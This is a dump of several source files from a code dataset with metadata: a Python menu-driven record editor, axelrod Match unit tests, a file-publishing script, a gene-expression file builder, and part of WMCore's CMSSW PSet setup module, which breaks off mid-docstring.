SelectedUser = 0\n for i in range(0,len(ANM)):\n print(\"[\"+str(i+1)+\"]: \"+ANM[i][0])\n print(\"-\"*20)\n choice = input(\":> \")\n try:\n choice = int(choice)\n except:\n editUser()\n SelectedUser = choice\n print(\"[1]: Delete\")\n print(\"[2]: Rename\")\n selection = ANM[SelectedUser-1][0]\n b0ck = \"Selection: \"\n print(\"-\"*(len(b0ck)+len(str(selection))))\n print(b0ck+str(selection))\n print(\"-\"*(len(b0ck)+len(str(selection))))\n choice = input(\":> \")\n try:\n choice = int(choice)\n except:\n editUser()\n if choice == 1:\n clear()\n print(\"Are you sure you want to delete [\"+str(ANM[choice-1][0])+\"]?, this will delete of this user's entries.\")\n choice = input(\"[Y/N]: \")\n choice = choice.lower()\n if choice == \"y\":\n del ANM[SelectedUser-1]\n else:\n editUser()\n elif choice == 2:\n clear()\n print(\"Enter a new name.\")\n newValue = input(\">: \")\n ANM[SelectedUser-1][0] = newValue\n else:\n editUser()\n save()\n print(\"Finished, enter any key to continue.\")\n input()\n editUser()\ndef editEntry():\n load()\n clear()\n if len(ANM) <= 0:\n print(\"Theres no data!\")\n input()\n menu(\"start\")\n else:\n SelectedUser = 0\n SelectedEntry = 0\n for i in range(0,len(ANM)):\n print(\"[\"+str(i+1)+\"]: \"+ANM[i][0])\n choice = input(\":> \")\n try:\n choice = int(choice)\n except:\n editEntry()\n SelectedUser = choice-1\n selection = ANM[choice-1]\n for i in range(1,len(selection)):\n print(\"[\"+str((i))+\"]: \"+str(selection[i]))\n choice = input(\":> \")\n try:\n choice = int(choice)\n except:\n editEntry()\n SelectedEntry = choice\n selection = selection[choice]\n clear()\n b0ck = \"Selection: \"\n print(\"-\"*(len(b0ck)+len(str(selection))))\n print(b0ck+str(selection))\n print(\"-\"*(len(b0ck)+len(str(selection))))\n print(\"[1]: Value #1\")\n print(\"[2]: Value #2\")\n print(\"[3]: Date\")\n print(\"[4]: Delete\")\n choice = input(\":> \")\n try:\n choice = int(choice)\n except:\n editEntry()\n if choice == 1:\n newValue = input(\"Enter A New Value: \")\n try:\n newValue = int(newValue)\n except:\n editEntry()\n ANM[SelectedUser][SelectedEntry][0] = newValue\n input(\"Finished, Press any key to continue.\")\n editEntry()\n elif choice == 2:\n newValue = input(\"Enter A New Value: \")\n try:\n newValue = int(newValue)\n except:\n editEntry()\n ANM[SelectedUser][SelectedEntry][1] = newValue\n input(\"Finished, Press any key to continue.\")\n editEntry()\n elif choice == 3:\n newValueOne = input(\"Enter A Day: \")\n newValueTwo = input(\"Enter A Month: \")\n newValueThree = input(\"Enter A Year: \")\n try:\n newValueOne = int(newValueOne)\n newValueTwo = int(newValueTwo)\n newValueThree = int(newValueThree)\n except:\n editEntry()\n elif choice == 4:\n del ANM[SelectedUser][SelectedEntry]\n else:\n editEntry()\n\n ANM[SelectedUser][SelectedEntry][2] = StringSplitList([newValueThree,newValueTwo,newValueOne],\"/\")\n save()\n input(\"Finished, Press any key to continue.\")\n editEntry()\ndef edit():\n clear()\n print(\"-\"*20)\n print(\"[1]: Edit User\")\n print(\"[2]: Edit Entry\")\n print(\"[3]: Return\")\n print(\"-\"*20)\n choice = input(\">: \")\n try:\n choice = int(choice)\n except:\n menu(\"start\")\n if choice == 1:\n editUser()\n elif choice == 2:\n editEntry()\n elif choice == 3:\n menu(\"start\")\n else:\n edit()\n\n\n\n\n\ndef plural(x):\n if x == 1 or x == -1:\n return(\"\")\n else:\n return(\"s\")\n\n\ndef stats():\n load()\n if len(ANM) <= 0:\n print(\"Theres no data!\")\n input()\n menu(\"start\")\n clear()\n print(\"/\"*40)\n for i in range(0,len(ANM)):\n pack = []\n pack.append(ANM[i][0])\n pog = ANM[i]\n for y in range(1,len(pog)):\n pack.append(pog[y][0])\n pack.append(pog[y][1])\n\n numbers = []\n top = 0\n topCount = 0\n for y in range(1,len(pack)):\n numbers.append(int(pack[y]))\n for y in range(1,len(pack)):\n if numbers.count(int(pack[y])) > top:\n top = int(pack[y])\n topCount = numbers.count(int(pack[y]))\n print(pog[0])\n print(\" Most Frequent Number: [\"+ str(top) + \"] Occurences: [\" + str(topCount)+\"]\")\n print(\"/\"*40)\n input(\"Press Any Key To Continue.\")\n menu(\"start\")\n \"\"\"\n data = []\n for i in range(0,len(ANM)):\n data.append([str(ANM[i][0])])\n for y in range(1,len(ANM[i])):\n data[i].append(ANM[i][y][0])\n data[i].append(ANM[i][y][1])\n numbers = []\n for z in range(0,len(data)):\n for y in range(1,len(data[z])):\n try:\n numbers.append(int(data[z][y]))\n except:\n pass\n\n mostFrequent = 0\n Occurences = 0\n for y in numbers:\n if numbers.count(y) > mostFrequent:\n mostFrequent = y\n Occurences = numbers.count(y)\n print(ANM[i][0])\n print(\" This Pog's Most Frequent Number Is: \" + str(mostFrequent) + \" , With \" + str(Occurences)+\" Occurence\" + plural(Occurences) + \"!\")\n input()\n \"\"\"\n\n\n\ndef menu(x):\n load()\n global ANM\n clear()\n def start():\n print(\"-\"*20)\n print(\"[1]: View\")\n print(\"[2]: Add\")\n print(\"[3]: Edit/Remove\")\n print(\"[4]: Stats\")\n print(\"-\"*20)\n choice = input(\"[]:> \")\n try:\n choice = int(choice)\n except:\n menu(\"start\")\n if choice == 1:\n view()\n elif choice == 2:\n add()\n elif choice == 3:\n edit()\n elif choice == 4:\n stats()\n else:\n menu(\"start\")\n exec(str.lower(x)+\"()\")\nmenu(\"start\")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"508360958","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nimport axelrod\nfrom axelrod import Actions\n\nfrom hypothesis import given, example\nfrom hypothesis.strategies import integers, floats, random_module, assume\n\nC, D = Actions.C, Actions.D\n\n\nclass TestMatch(unittest.TestCase):\n\n @given(turns=integers(min_value=1, max_value=200),\n prob_end=floats(min_value=0, max_value=1))\n @example(turns=5, prob_end=None)\n def test_init(self, turns, prob_end):\n p1, p2 = axelrod.Cooperator(), axelrod.Cooperator()\n match = axelrod.Match((p1, p2), turns, prob_end=prob_end)\n self.assertEqual(match.result, [])\n self.assertEqual(match.player1, p1)\n self.assertEqual(match.player2, p2)\n self.assertEqual(\n match._classes, (axelrod.Cooperator, axelrod.Cooperator))\n self.assertEqual(match._turns, turns)\n self.assertEqual(match._prob_end, prob_end)\n self.assertEqual(match._cache, {})\n self.assertEqual(match._cache_mutable, True)\n self.assertEqual(match._noise, 0)\n\n # Checking that prob_end has default None\n match = axelrod.Match((p1, p2), turns)\n self.assertEqual(match.result, [])\n self.assertEqual(match.player1, p1)\n self.assertEqual(match.player2, p2)\n self.assertEqual(\n match._classes, (axelrod.Cooperator, axelrod.Cooperator))\n self.assertEqual(match._turns, turns)\n self.assertEqual(match._prob_end, None)\n self.assertEqual(match._cache, {})\n self.assertEqual(match._cache_mutable, True)\n self.assertEqual(match._noise, 0)\n\n @given(p=floats(min_value=0, max_value=1),\n rm=random_module())\n def test_stochastic(self, p, rm):\n\n assume(0 < p < 1)\n\n p1, p2 = axelrod.Cooperator(), axelrod.Cooperator()\n match = axelrod.Match((p1, p2), 5)\n self.assertFalse(match._stochastic)\n\n match = axelrod.Match((p1, p2), 5, noise=p)\n self.assertTrue(match._stochastic)\n\n match = axelrod.Match((p1, p2), 5, prob_end=p)\n self.assertTrue(match._stochastic)\n\n p1 = axelrod.Random()\n match = axelrod.Match((p1, p2), 5)\n self.assertTrue(match._stochastic)\n\n @given(p=floats(min_value=0, max_value=1),\n rm=random_module())\n def test_cache_update_required(self, p, rm):\n\n assume(0 < p < 1)\n\n p1, p2 = axelrod.Cooperator(), axelrod.Cooperator()\n match = axelrod.Match((p1, p2), 5, noise=p)\n self.assertFalse(match._cache_update_required)\n\n match = axelrod.Match((p1, p2), 5, prob_end=p)\n self.assertFalse(match._cache_update_required)\n\n match = axelrod.Match((p1, p2), 5, cache_mutable=False)\n self.assertFalse(match._cache_update_required)\n\n match = axelrod.Match((p1, p2), 5)\n self.assertTrue(match._cache_update_required)\n\n p1 = axelrod.Random()\n match = axelrod.Match((p1, p2), 5)\n self.assertFalse(match._cache_update_required)\n\n def test_play(self):\n cache = {}\n players = (axelrod.Cooperator(), axelrod.Defector())\n match = axelrod.Match(players, 3, cache)\n expected_result = [(C, D), (C, D), (C, D)]\n self.assertEqual(match.play(), expected_result)\n self.assertEqual(\n cache[(axelrod.Cooperator, axelrod.Defector)], expected_result)\n\n # a deliberately incorrect result so we can tell it came from the cache\n expected_result = [(C, C), (D, D), (D, C)]\n cache = {(axelrod.Cooperator, axelrod.Defector): expected_result}\n match = axelrod.Match(players, 3, cache)\n self.assertEqual(match.play(), expected_result)\n\n @given(turns=integers(min_value=1, max_value=200),\n prob_end=floats(min_value=0, max_value=1),\n rm=random_module())\n def test_prob_end_play(self, turns, prob_end, rm):\n\n players = (axelrod.Cooperator(), axelrod.Defector())\n match = axelrod.Match(players, turns, prob_end=prob_end)\n self.assertTrue(0 <= len(match.play()))\n\n # If game has no ending the length will be turns\n match = axelrod.Match(players, turns, prob_end=0)\n self.assertEqual(len(match.play()), turns)\n\n # If game has 1 prob of ending it lasts only one turn\n match = axelrod.Match(players, turns, prob_end=1)\n self.assertEqual(len(match.play()), 1)\n\n @given(prob_end=floats(min_value=0.25, max_value=0.75),\n rm=random_module())\n def test_prob_end_play_with_no_turns(self, prob_end, rm):\n players = (axelrod.Cooperator(), axelrod.Defector())\n match = axelrod.Match(players, float(\"inf\"), prob_end=prob_end)\n self.assertTrue(0 <= len(match.play()))\n\n def test_sparklines(self):\n players = (axelrod.Cooperator(), axelrod.Alternator())\n match = axelrod.Match(players, 4)\n match.play()\n expected_sparklines = u'████\\n█ █ '\n self.assertEqual(match.sparklines(), expected_sparklines)\n expected_sparklines = u'XXXX\\nXYXY'\n self.assertEqual(match.sparklines('X', 'Y'), expected_sparklines)\n","sub_path":"axelrod/tests/unit/test_match.py","file_name":"test_match.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"162732842","text":"import os\nimport shutil\n\nfileDir = os.path.dirname(os.path.abspath(__file__))\nbackendDir = os.path.dirname(fileDir)\npublishDir = os.path.join(os.path.dirname(backendDir), \"publish\")\n\n\ndef copyBackendToPublish(src, dst):\n for item in os.listdir(src):\n s = os.path.join(src, item)\n d = os.path.join(dst, item)\n if os.path.isdir(s) and item != \"scripts\":\n shutil.copytree(s, d)\n elif os.path.isfile(s):\n shutil.copyfile(s, d)\n\n\ndef cleanPublish():\n for item in os.listdir(publishDir):\n s = os.path.join(publishDir, item)\n if os.path.isdir(s) and item != \"build\":\n shutil.rmtree(s)\n elif os.path.isfile(s):\n os.remove(s)\n\n\ncleanPublish()\ncopyBackendToPublish(backendDir, publishDir)\n","sub_path":"MY_REPOS/Lambda-Resource-Static-Assets/13-web-tools/REUSABLE_WEB_COMPONENTS/FlaskDefault/backend/scripts/publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"288964922","text":"# Script to create a file with the following tab-separated fields for each Ensembl gene:\n# chromosome\n# start\n# end\n# name/ID\n# B cell TPM values (csv);T cell TPM values (csv)\n# strand\n\n# For input need:\n# Reference GTF\n# TSV of B cell TPM values (first field is gene name, second is ensembl ID, rest are TPM values)\n# TSV of T cell TPM values (first field is gene name, second is ensembl ID, rest are TPM values)\n# Output file name\n\nimport sys\nimport re\n\ndef tidyAttr(attrVal):\n\t# Remove unwanted characters (quotes, semicolons) from attribute value strings\n\treturn re.sub(\"[\\\";]\", \"\", attrVal)\n\ndef processGtf(gtfFile):\n\t# Go through a GTF file line-by-line and pull out gene information\n\t# Save in a dict with ensembl IDs as keys and dicts as values\n\tprint(\"Processing GTF file ... \"),\n\tsys.stdout.flush()\n\toutDict = {}\n\t\n\twith open(gtfFile, 'r') as f:\n\t\tfor line in f:\n\t\t\tif line[0] == \"#\":\n\t\t\t\tcontinue\n\t\t\n\t\t\tlineList = re.split(\"\\s+\", line.strip())\n\t\t\tif lineList[2] != \"gene\":\n\t\t\t\tcontinue\n\t\t\t\n\t\t\toutDict[tidyAttr(lineList[9])] = {\n\t\t\t\t\t\t\t\t\t\t\t\t\"chromosome\":\"chr\"+lineList[0],\n\t\t\t\t\t\t\t\t\t\t\t\t\"start\":lineList[3],\n\t\t\t\t\t\t\t\t\t\t\t\t\"end\":lineList[4],\n\t\t\t\t\t\t\t\t\t\t\t\t\"strand\":lineList[6],\n\t\t\t\t\t\t\t\t\t\t\t\t\"b_expr\":[],\n\t\t\t\t\t\t\t\t\t\t\t\t\"t_expr\":[]\n\t\t\t\t\t\t\t\t\t\t\t}\n\tprint(\"Done\")\n\treturn outDict\n\t\ndef addExprVals(geneDict, bExprTsv, tExprTsv):\n\t# Go through the TSV files of expression levels and add to the gene dictionary\n\tprint(\"Adding expression values to gene dictionary ... \"),\n\tsys.stdout.flush()\n\tfor tsv,k in zip([bExprTsv, tExprTsv], [\"b_expr\", \"t_expr\"]):\n\t\twith open(tsv, 'r') as f:\n\t\t\tfor line in f:\n\t\t\t\tlineList = line.strip().split(\"\\t\")\n\t\t\t\tgeneDict[lineList[1]][k] = lineList[2:]\n\tprint(\"Done\")\n\treturn geneDict\n\t\ndef writeToFile(geneDict, outFile):\n\tprint(\"Writing results to file ... \"),\n\tsys.stdout.flush()\n\twith open(outFile, 'wa') as f:\n\t\tfor k in geneDict.keys():\n\t\t\td = geneDict[k]\n\t\t\toutStr = \"\\t\".join([\n\t\t\t\t\t\t\t\td[\"chromosome\"],\n\t\t\t\t\t\t\t\td[\"start\"],\n\t\t\t\t\t\t\t\td[\"end\"],\n\t\t\t\t\t\t\t\tk,\n\t\t\t\t\t\t\t\t\",\".join(d[\"b_expr\"])+\";\"+\",\".join(d[\"t_expr\"]),\n\t\t\t\t\t\t\t\td[\"strand\"]\n\t\t\t\t\t\t\t ]) + \"\\n\"\n\t\t\tf.write(outStr)\n\t\t\t\n\tprint(\"Done\")\n\t\t\t\ngtfFile = sys.argv[1]\nbExprTsv = sys.argv[2]\ntExprTsv = sys.argv[3]\noutFile = sys.argv[4]\n\ngeneDict = addExprVals(processGtf(gtfFile), bExprTsv, tExprTsv)\n\nwriteToFile(geneDict, outFile)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\t\t\t\n\t\t\n\t\n","sub_path":"scripts/make_gene_expr_by_cell_file.py","file_name":"make_gene_expr_by_cell_file.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"275318337","text":"\"\"\"\n_SetupCMSSWPset_\n\nCreate a CMSSW PSet suitable for running a WMAgent job.\n\n\"\"\"\nfrom __future__ import print_function\n\nimport json\nimport logging\nimport os\nimport pickle\nimport random\nimport socket\nimport re\n\nimport FWCore.ParameterSet.Config as cms\n\nfrom PSetTweaks.PSetTweak import PSetTweak\nfrom PSetTweaks.WMTweak import applyTweak, makeJobTweak, makeOutputTweak, makeTaskTweak, resizeResources\nfrom WMCore.Storage.SiteLocalConfig import loadSiteLocalConfig\nfrom WMCore.Storage.TrivialFileCatalog import TrivialFileCatalog\nfrom WMCore.WMRuntime.ScriptInterface import ScriptInterface\nfrom WMCore.WMRuntime.Tools.Scram import isCMSSWSupported, isEnforceGUIDInFileNameSupported\n\n\ndef fixupGlobalTag(process):\n \"\"\"\n _fixupGlobalTag_\n\n Make sure that the process has a GlobalTag.globaltag string.\n\n Requires that the configuration already has a properly configured GlobalTag object.\n\n \"\"\"\n if hasattr(process, \"GlobalTag\"):\n if not hasattr(process.GlobalTag, \"globaltag\"):\n process.GlobalTag.globaltag = cms.string(\"\")\n return\n\n\ndef fixupGlobalTagTransaction(process):\n \"\"\"\n _fixupGlobalTagTransaction_\n\n Make sure that the process has a GlobalTag.DBParameters.transactionId string.\n\n Requires that the configuration already has a properly configured GlobalTag object\n\n (used to customize conditions access for Tier0 express processing)\n\n \"\"\"\n if hasattr(process, \"GlobalTag\"):\n if not hasattr(process.GlobalTag.DBParameters, \"transactionId\"):\n process.GlobalTag.DBParameters.transactionId = cms.untracked.string(\"\")\n return\n\n\ndef fixupFirstRun(process):\n \"\"\"\n _fixupFirstRun_\n\n Make sure that the process has a firstRun parameter.\n\n \"\"\"\n if not hasattr(process.source, \"firstRun\"):\n process.source.firstRun = cms.untracked.uint32(0)\n return\n\n\ndef fixupLastRun(process):\n \"\"\"\n _fixupLastRun_\n\n Make sure that the process has a lastRun parameter.\n\n \"\"\"\n if not hasattr(process.source, \"lastRun\"):\n process.source.lastRun = cms.untracked.uint32(0)\n return\n\n\ndef fixupLumisToProcess(process):\n \"\"\"\n _fixupLumisToProcess_\n\n Make sure that the process has a lumisToProcess parameter.\n\n \"\"\"\n if not hasattr(process.source, \"lumisToProcess\"):\n process.source.lumisToProcess = cms.untracked.VLuminosityBlockRange()\n return\n\n\ndef fixupSkipEvents(process):\n \"\"\"\n _fixupSkipEvents_\n\n Make sure that the process has a skip events parameter.\n\n \"\"\"\n if not hasattr(process.source, \"skipEvents\"):\n process.source.skipEvents = cms.untracked.uint32(0)\n return\n\n\ndef fixupFirstEvent(process):\n \"\"\"\n _fixupFirstEvent_\n\n Make sure that the process has a first event parameter.\n\n \"\"\"\n if not hasattr(process.source, \"firstEvent\"):\n process.source.firstEvent = cms.untracked.uint32(0)\n return\n\n\ndef fixupMaxEvents(process):\n \"\"\"\n _fixupMaxEvents_\n\n Make sure that the process has a max events parameter.\n\n \"\"\"\n if not hasattr(process, \"maxEvents\"):\n process.maxEvents = cms.untracked.PSet(input=cms.untracked.int32(-1))\n if not hasattr(process.maxEvents, \"input\"):\n process.maxEvents.input = cms.untracked.int32(-1)\n return\n\n\ndef fixupFileNames(process):\n \"\"\"\n _fixupFileNames_\n\n Make sure that the process has a fileNames parameter.\n\n \"\"\"\n if not hasattr(process.source, \"fileNames\"):\n process.source.fileNames = cms.untracked.vstring()\n return\n\n\ndef fixupSecondaryFileNames(process):\n \"\"\"\n _fixupSecondaryFileNames_\n\n Make sure that the process has a secondaryFileNames parameter.\n\n \"\"\"\n if not hasattr(process.source, \"secondaryFileNames\"):\n process.source.secondaryFileNames = cms.untracked.vstring()\n return\n\n\ndef fixupFirstLumi(process):\n \"\"\"\n _fixupFirstLumi\n\n Make sure that the process has firstLuminosityBlock parameter.\n \"\"\"\n if not hasattr(process.source, \"firstLuminosityBlock\"):\n process.source.firstLuminosityBlock = cms.untracked.uint32(1)\n return\n\n\nclass SetupCMSSWPset(ScriptInterface):\n \"\"\"\n _SetupCMSSWPset_\n\n \"\"\"\n fixupDict = {\"process.GlobalTag.globaltag\": fixupGlobalTag,\n \"process.GlobalTag.DBParameters.transactionId\": fixupGlobalTagTransaction,\n \"process.source.fileNames\": fixupFileNames,\n \"process.source.secondaryFileNames\": fixupSecondaryFileNames,\n \"process.maxEvents.input\": fixupMaxEvents,\n \"process.source.skipEvents\": fixupSkipEvents,\n \"process.source.firstEvent\": fixupFirstEvent,\n \"process.source.firstRun\": fixupFirstRun,\n \"process.source.lastRun\": fixupLastRun,\n \"process.source.lumisToProcess\": fixupLumisToProcess,\n \"process.source.firstLuminosityBlock\": fixupFirstLumi}\n\n def __init__(self, crabPSet=False):\n ScriptInterface.__init__(self)\n self.crabPSet = crabPSet\n self.process = None\n self.jobBag = None\n self.logger = logging.getLogger()\n\n def createProcess(self, scenario, funcName, funcArgs):\n \"\"\"\n _createProcess_\n\n Create a Configuration.DataProcessing PSet.\n\n \"\"\"\n if funcName == \"merge\":\n\n if getattr(self.jobBag, \"useErrorDataset\", False):\n funcArgs['outputmod_label'] = \"MergedError\"\n\n try:\n from Configuration.DataProcessing.Merge import mergeProcess\n self.process = mergeProcess(**funcArgs)\n except Exception as ex:\n msg = \"Failed to create a merge process.\"\n self.logger.exception(msg)\n raise ex\n elif funcName == \"repack\":\n try:\n from Configuration.DataProcessing.Repack import repackProcess\n self.process = repackProcess(**funcArgs)\n except Exception as ex:\n msg = \"Failed to create a repack process.\"\n self.logger.exception(msg)\n raise ex\n else:\n try:\n from Configuration.DataProcessing.GetScenario import getScenario\n scenarioInst = getScenario(scenario)\n except Exception as ex:\n msg = \"Failed to retrieve the Scenario named \"\n msg += str(scenario)\n msg += \"\\nWith Error:\"\n msg += str(ex)\n self.logger.error(msg)\n raise ex\n try:\n self.process = getattr(scenarioInst, funcName)(**funcArgs)\n except Exception as ex:\n msg = \"Failed to load process from Scenario %s (%s).\" % (scenario, scenarioInst)\n self.logger.error(msg)\n raise ex\n\n return\n\n def loadPSet(self):\n \"\"\"\n _loadPSet_\n\n Load a PSet that was shipped with the job sandbox.\n\n \"\"\"\n psetModule = \"WMTaskSpace.%s.PSet\" % self.step.data._internal_name\n\n try:\n processMod = __import__(psetModule, globals(), locals(), [\"process\"], -1)\n self.process = processMod.process\n except ImportError as ex:\n msg = \"Unable to import process from %s:\\n\" % psetModule\n msg += str(ex)\n self.logger.error(msg)\n raise ex\n\n return\n\n def fixupProcess(self):\n \"\"\"\n _fixupProcess_\n\n Look over the process object and make sure that all of the attributes\n that we expect to exist actually exist.\n\n \"\"\"\n # Make sure that for each output module the following parameters exist\n # in the PSet returned from the framework:\n # fileName\n # logicalFileName\n # dataset.dataTier\n # dataset.filterName\n if hasattr(self.process, \"outputModules\"):\n outputModuleNames = self.process.outputModules.keys()\n else:\n outputModuleNames = self.process.outputModules_()\n for outMod in outputModuleNames:\n outModRef = getattr(self.process, outMod)\n if not hasattr(outModRef, \"dataset\"):\n outModRef.dataset = cms.untracked.PSet()\n if not hasattr(outModRef.dataset, \"dataTier\"):\n outModRef.dataset.dataTier = cms.untracked.string(\"\")\n if not hasattr(outModRef.dataset, \"filterName\"):\n outModRef.dataset.filterName = cms.untracked.string(\"\")\n if not hasattr(outModRef, \"fileName\"):\n outModRef.fileName = cms.untracked.string(\"\")\n if not hasattr(outModRef, \"logicalFileName\"):\n outModRef.logicalFileName = cms.untracked.string(\"\")\n return\n\n def applyTweak(self, psetTweak):\n \"\"\"\n _applyTweak_\n\n Apply a tweak to the process.\n \"\"\"\n tweak = PSetTweak()\n tweak.unpersist(psetTweak)\n applyTweak(self.process, tweak, self.fixupDict)\n return\n\n def handleSeeding(self):\n \"\"\"\n _handleSeeding_\n\n Handle Random Seed settings for the job\n \"\"\"\n seeding = getattr(self.jobBag, \"seeding\", None)\n self.logger.info(\"Job seeding set to: %s\", seeding)\n if seeding == \"ReproducibleSeeding\":\n randService = self.process.RandomNumberGeneratorService\n tweak = PSetTweak()\n for x in randService:\n parameter = \"process.RandomNumberGeneratorService.%s.initialSeed\" % x._internal_name\n tweak.addParameter(parameter, x.initialSeed)\n applyTweak(self.process, tweak, self.fixupDict)\n else:\n if hasattr(self.process, \"RandomNumberGeneratorService\"):\n from IOMC.RandomEngine.RandomServiceHelper import RandomNumberServiceHelper\n helper = RandomNumberServiceHelper(self.process.RandomNumberGeneratorService)\n helper.populate()\n return\n\n def handlePerformanceSettings(self):\n \"\"\"\n _handlePerformanceSettings_\n\n Install the standard performance report services\n \"\"\"\n # include the default performance report services\n if getattr(self.step.data.application.command, 'silentMemoryCheck', False):\n self.process.add_(cms.Service(\"SimpleMemoryCheck\", jobReportOutputOnly=cms.untracked.bool(True)))\n else:\n self.process.add_(cms.Service(\"SimpleMemoryCheck\"))\n\n self.process.add_(cms.Service(\"CPU\"))\n self.process.add_(cms.Service(\"Timing\"))\n self.process.Timing.summaryOnly = cms.untracked(cms.bool(True))\n\n return\n\n def handleChainedProcessing(self):\n \"\"\"\n _handleChainedProcessing_\n\n In order to handle chained processing it's necessary to feed\n output of one step/task (nomenclature ambiguous) to another.\n This method creates particular mapping in a working Trivial\n File Catalog (TFC).\n \"\"\"\n self.logger.info(\"Handling chained processing job\")\n # first, create an instance of TrivialFileCatalog to override\n tfc = TrivialFileCatalog()\n # check the jobs input files\n inputFile = (\"../%s/%s.root\" % (self.step.data.input.inputStepName,\n self.step.data.input.inputOutputModule))\n tfc.addMapping(\"direct\", inputFile, inputFile, mapping_type=\"lfn-to-pfn\")\n tfc.addMapping(\"direct\", inputFile, inputFile, mapping_type=\"pfn-to-lfn\")\n\n fixupFileNames(self.process)\n fixupMaxEvents(self.process)\n self.process.source.fileNames.setValue([inputFile])\n self.process.maxEvents.input.setValue(-1)\n\n tfcName = \"override_catalog.xml\"\n tfcPath = os.path.join(os.getcwd(), tfcName)\n self.logger.info(\"Creating override TFC and saving into '%s'\", tfcPath)\n tfcStr = tfc.getXML()\n with open(tfcPath, 'w') as tfcFile:\n tfcFile.write(tfcStr)\n\n self.step.data.application.overrideCatalog = \"trivialcatalog_file:\" + tfcPath + \"?protocol=direct\"\n\n return\n\n def handlePileup(self):\n \"\"\"\n _handlePileup_\n\n Handle pileup settings.\n \"\"\"\n # find out local site SE name\n siteConfig = loadSiteLocalConfig()\n PhEDExNodeName = siteConfig.localStageOut[\"phedex-node\"]\n self.logger.info(\"Running on site '%s', local PNN: '%s'\", siteConfig.siteName, PhEDExNodeName)\n\n pileupDict = self._getPileupConfigFromJson()\n\n # 2011-02-03 according to the most recent version of instructions, we do\n # want to differentiate between \"MixingModule\" and \"DataMixingModule\"\n mixModules, dataMixModules = self._getPileupMixingModules()\n\n # 2011-02-03\n # on the contrary to the initial instructions (wave), there are\n # going to be only two types of pileup input datasets: \"data\" or \"mc\"\n # unlike all previous places where pileupType handled in a flexible\n # way as specified in the configuration passed by the user, here are\n # the two pileupTypes hardcoded: and we are going to add the \"mc\"\n # datasets to \"MixingModule\"s and only add the \"data\" datasets to the\n # \"DataMixingModule\"s\n\n # if the user in the configuration specifies different pileup types\n # than \"data\" or \"mc\", the following call will not modify anything\n self._processPileupMixingModules(pileupDict, PhEDExNodeName, dataMixModules, \"data\")\n self._processPileupMixingModules(pileupDict, PhEDExNodeName, mixModules, \"mc\")\n\n return\n\n def _processPileupMixingModules(self, pileupDict, PhEDExNodeName,\n modules, requestedPileupType):\n \"\"\"\n Iterates over all modules and over all pileup configuration types.\n The only considered types are \"data\" and \"mc\" (input to this method).\n If other pileup types are specified by the user, the method doesn't\n modify anything.\n\n The method considers only files which are present on this local PNN.\n The job will use only those, unless it was told to trust the PU site\n location (trustPUSitelists=True), in this case ALL the blocks/files\n will be added to the PSet and files will be read via AAA.\n Dataset, divided into blocks, may not have all blocks present on a\n particular PNN. However, all files belonging into a block will be\n present when reported by DBS.\n\n The structure of the pileupDict: PileupFetcher._queryDbsAndGetPileupConfig\n\n 2011-02-03:\n According to the current implementation of helper testing module\n WMCore_t/WMRuntime_t/Scripts_t/WMTaskSpace/cmsRun1/PSet.py\n each type of modules instances can have either \"secsource\"\n or \"input\" attribute, so need to probe both, one shall succeed.\n \"\"\"\n self.logger.info(\"Requested pileup type %s with %d mixing modules\", requestedPileupType, len(modules))\n\n for m in modules:\n self.logger.info(\"Loaded module type: %s\", m.type_())\n for pileupType in self.step.data.pileup.listSections_():\n # there should be either \"input\" or \"secsource\" attributes\n # and both \"MixingModule\", \"DataMixingModule\" can have both\n inputTypeAttrib = getattr(m, \"input\", None) or getattr(m, \"secsource\", None)\n self.logger.info(\"pileupType: %s with input attributes: %s\", pileupType, bool(inputTypeAttrib))\n if not inputTypeAttrib:\n continue\n inputTypeAttrib.fileNames = cms.untracked.vstring()\n if pileupType == requestedPileupType:\n eventsAvailable = 0\n useAAA = True if getattr(self.jobBag, 'trustPUSitelists', False) else False\n self.logger.info(\"Pileup set to read data remotely: %s\", useAAA)\n for blockName in sorted(pileupDict[pileupType].keys()):\n blockDict = pileupDict[pileupType][blockName]\n if PhEDExNodeName in blockDict[\"PhEDExNodeNames\"] or useAAA:\n eventsAvailable += int(blockDict.get('NumberOfEvents', 0))\n for fileLFN in blockDict[\"FileList\"]:\n # vstring does not support unicode\n inputTypeAttrib.fileNames.append(str(fileLFN))\n if requestedPileupType == 'data':\n if getattr(self.jobBag, 'skipPileupEvents', None) is not None:\n # For deterministic pileup, we want to shuffle the list the\n # same for every job in the task and skip events\n random.seed(self.job['task'])\n self.logger.info(\"Skipping %d pileup events for deterministic data mixing\",\n self.jobBag.skipPileupEvents)\n inputTypeAttrib.skipEvents = cms.untracked.uint32(\n int(self.jobBag.skipPileupEvents) % eventsAvailable)\n inputTypeAttrib.sequential = cms.untracked.bool(True)\n # Shuffle according to the seed above or randomly\n random.shuffle(inputTypeAttrib.fileNames)\n self.logger.info(\"Added %s events from the pileup blocks\", eventsAvailable)\n\n # Handle enforceGUIDInFileName for pileup\n self.handleEnforceGUIDInFileName(inputTypeAttrib)\n\n return\n\n def _getPileupMixingModules(self):\n \"\"\"\n Method returns two lists:\n 1) list of mixing modules (\"MixingModule\")\n 2) list of data mixing modules (\"DataMixingModules\")\n The first gets added only pileup files of type \"mc\", the\n second pileup files of type \"data\".\n\n \"\"\"\n mixModules, dataMixModules = [], []\n prodsAndFilters = {}\n prodsAndFilters.update(self.process.producers)\n prodsAndFilters.update(self.process.filters)\n for key, value in prodsAndFilters.items():\n if value.type_() in [\"MixingModule\", \"DataMixingModule\", \"PreMixingModule\"]:\n mixModules.append(value)\n if value.type_() == \"DataMixingModule\":\n dataMixModules.append(value)\n return mixModules, dataMixModules\n\n def _getPileupConfigFromJson(self):\n \"\"\"\n There has been stored pileup configuration stored in a JSON file\n as a result of DBS querrying when running PileupFetcher,\n this method loads this configuration from sandbox and returns it\n as dictionary.\n\n The PileupFetcher was called by WorkQueue which creates job's sandbox\n and sandbox gets 